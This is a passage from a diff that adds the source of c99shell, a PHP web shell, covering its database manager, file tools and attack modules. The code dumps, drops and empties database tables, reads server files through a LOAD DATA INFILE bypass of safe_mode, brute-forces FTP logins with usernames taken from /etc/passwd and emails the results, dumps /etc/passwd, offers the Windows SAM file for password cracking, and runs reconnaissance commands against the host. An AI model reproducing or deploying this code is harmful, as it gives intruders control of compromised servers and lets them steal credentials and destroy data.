0; + $set["file"] = $dump_file; + $set["add_drop"] = true; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "<b>Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "<b>Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")</b>."; + } + } + else {echo "<b>Dump: nothing to do!</b>";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;"; + if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "<br><br><b>Inserting row into table:</b><br>"; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>"; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; + $i++; + } + echo "</table><br>"; + echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; + if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} + echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "<hr size=\"1\" noshade>"; + echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;"; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} + else {echo "&nbsp;";} + } + if ($i == 0) {echo "empty";} + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>"; + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>"; + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; + for ($i=0;$i<mysql_num_fields($result);$i++) + { + $v = mysql_field_name($result,$i); + if ($e[0] == "a") {$s = "d"; $m = "asc";} + else {$s = "a"; $m = "desc";} + echo "<td>"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} + else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} + echo "</td>"; + } + echo "<td><font color=\"green\"><b>Action</b></font></td>"; + echo "</tr>"; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo "<tr>"; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "<font color=\"green\">NULL</font>";} + echo "<td>".$v."</td>"; + $i++; + } + echo "<td>"; + echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;"; + echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;"; + echo "</td>"; + echo "</tr>"; + } + mysql_free_result($result); + echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"deleterow\">Delete</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo "<tr>"; + echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>"; + echo "<td>".$row["Rows"]."</td>"; + echo "<td>".$row["Type"]."</td>"; + echo "<td>".$row["Create_time"]."</td>"; + echo "<td>".$row["Update_time"]."</td>"; + echo "<td>".$size."</td>"; + echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>"; + echo "</tr>"; + $i++; + } + echo "<tr bgcolor=\"000000\">"; + echo "<td><center><b>آ»</b></center></td>"; + echo "<td><center><b>".$i." table(s)</b></center></td>"; + echo "<td><b>".$trows."</b></td>"; + echo "<td>".$row[1]."</td>"; + echo "<td>".$row[10]."</td>"; + echo "<td>".$row[11]."</td>"; + echo "<td><b>".view_size($tsize)."</b></td>"; + echo "<td></td>"; + echo "</tr>"; + echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; + echo "<option value=\"\">With selected:</option>"; + echo "<option value=\"tbldrop\">Drop</option>"; + echo "<option value=\"tblempty\">Empty</option>"; + echo "<option value=\"tbldump\">Dump</option>"; + echo "<option value=\"tblcheck\">Check table</option>"; + echo "<option value=\"tbloptimize\">Optimize table</option>"; + echo "<option value=\"tblrepair\">Repair table</option>"; + echo "<option value=\"tblanalyze\">Analyze table</option>"; + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>"; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } + if (!empty($sql_act)) + { + echo "<hr size=\"1\" noshade>"; + if ($sql_act == "newdb") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "<center><b>Server-status variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table></center>"; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "<center><b>Server variables:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "<center><b>Processes:</b><br><br>"; + echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} + echo "</table>"; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = false; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} + else + { + for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} + $f = ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} + if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} + else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "</td></tr></table>"; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; + } + echo "</table>"; +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} + elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} + echo "<br><br>"; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "<b>Ftp Quick brute:</b><br>"; + if (!win) {echo "This functions not work in Windows!<br><br>";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$true = (!in_array($sh,array("/bin/false","/sbin/nologin")));} + else {$true = true;} + if ($true) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; + ob_flush(); + return true; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = false;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; + } + } +} +if ($act == "d") +{ + if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} + else + { + echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; + if (!$win) + { + echo "<tr><td><b>Owner/Group</b></td><td> "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();} +if ($act == "security") +{ + echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "<b>*nix /etc/passwd:</b><br>"; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>"; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; + echo join(":",$uid)."<br>"; + } + $i++; + } + } + else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} + } + else + { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} + else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ آ©.</font></b><br>";} + } + if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} + if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} + if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} + if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} + if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} + function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} + displaysecinfo("OS Version?",myshellexec("cat /proc/version")); + displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); + displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); + displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); + displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); + displaysecinfo("RAM",myshellexec("free -m")); + displaysecinfo("HDD space",myshellexec("df -h")); + displaysecinfo("List of Attributes",myshellexec("lsattr -a")); + displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); + displaysecinfo("Is cURL installed?",myshellexec("which curl")); + displaysecinfo("Is lynx installed?",myshellexec("which lynx")); + displaysecinfo("Is links installed?",myshellexec("which links")); + displaysecinfo("Is fetch installed?",myshellexec("which fetch")); + displaysecinfo("Is GET installed?",myshellexec("which GET")); + displaysecinfo("Is perl installed?",myshellexec("which perl")); + displaysecinfo("Where is apache",myshellexec("whereis apache")); + displaysecinfo("Where is perl?",myshellexec("whereis perl")); + displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); + displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); + displaysecinfo("locate my.conf",myshellexec("locate my.conf")); + displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); +} +if ($act == "mkfile") +{ + if ($mkfile != $d) + { + if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} + elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} + else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} + } + else {$act = $dspact = "ls";} +} +if ($act == "encoder") +{ + echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; + foreach(array("md5","crypt","sha1","crc32") as $v) + { + echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; + } + echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> + <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> + <br></center><b>Base64:</b><center>base64_encode - <input type=text 